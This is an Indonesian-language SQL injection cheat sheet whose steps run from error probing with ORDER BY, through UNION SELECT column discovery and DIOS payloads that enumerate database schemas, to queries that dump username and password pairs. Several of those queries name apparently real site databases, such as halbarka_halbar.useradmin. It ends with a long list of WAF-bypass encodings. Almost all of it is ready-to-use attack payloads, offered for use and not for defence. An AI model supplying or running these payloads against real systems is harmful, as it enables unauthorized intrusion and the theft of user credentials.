Sql manual rosit

Query Exploit SQL MANUAL

UNTUK CEK ERRORNYA

+order+by+1--

'+order+by+100--+-


Tahap Memunculkan Angka Ajaib / angka Vuln
+union+select+1,2,3--

'+/*!50000union*/+/*!50000select*/+1,2,3--+-


(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))

'+union+select+1,2,3,4,concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),6,7--+-

+union select 1,concat (0x494e4a454354204259202e2f4359424552303054202d,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),3,4,5,6-- (kalau ga bsa pake tanda (-) (versi DIOS)


(Tahap Menampilkan Data yang ada pada database )

+union+select+1,2,3,concat(email,0x3a3a,password),5,6 from user--
'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(username,0x3a3a,password),22,23,24,25,26,27,28,29,30,31,32,33,34 from users--+-

+union+select+1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10 from kukan_user--

'+union+select+1,2,3,4,group_concat(username,0x3a3a,pwd,0x3a3a,level,'<br>'),6,7,8,9,10,11,12,13,14 from user--+-

'+union+select+1,2,concat(Username,0x3a,Password),4+from+user--+ (pake tanda - ) < kalau error

(SELECT(@x)FROM(SELECT(@x:=0x00)+,(SELECT(@x)FROM(kpusumba_webtemp.tb_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)

[QUERY SCHOOLHOST]

' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

Dios tampilin table ZEROONE-04

Concat(0x3c43656e7465723e,0x4b656e746f6420627920526f73697420426f74616b,0x2d,%200x3c696d67207372633d22687474703a2f2f6f70656e7369642e696e666f2f696d616765732f526961732532304772656d6f72792e706e67223e,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)

Bypass waff:

[~]waff nampilin user pass[~]

(SELECT(@x)/*!50000FROM*/(SELECT(@x:=0x00)%20,(SELECT(@x)/*!50000FROM*/(halbarka_halbar.useradmin)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,username,0x7e,password,0x3c62723e))))x)

[~]waff nampilin table[~]
halbarka_halbar
(select(@x)/*!50000from*/(select(@x:=0x00),(select(0)/*!50000from*/(/*!50000information_schema*/./*!50000columns*/)/*!50000where*/(/*!50000table_schema*/=database/**_**/())/*!50000and*/(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/**/union/*!50000select*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect

[~]Bypass different colum nomber[~]

and x(point(0,0)) UNION SELECT
=75=75 union select
+And x(point(9,9))+UNION+SELECT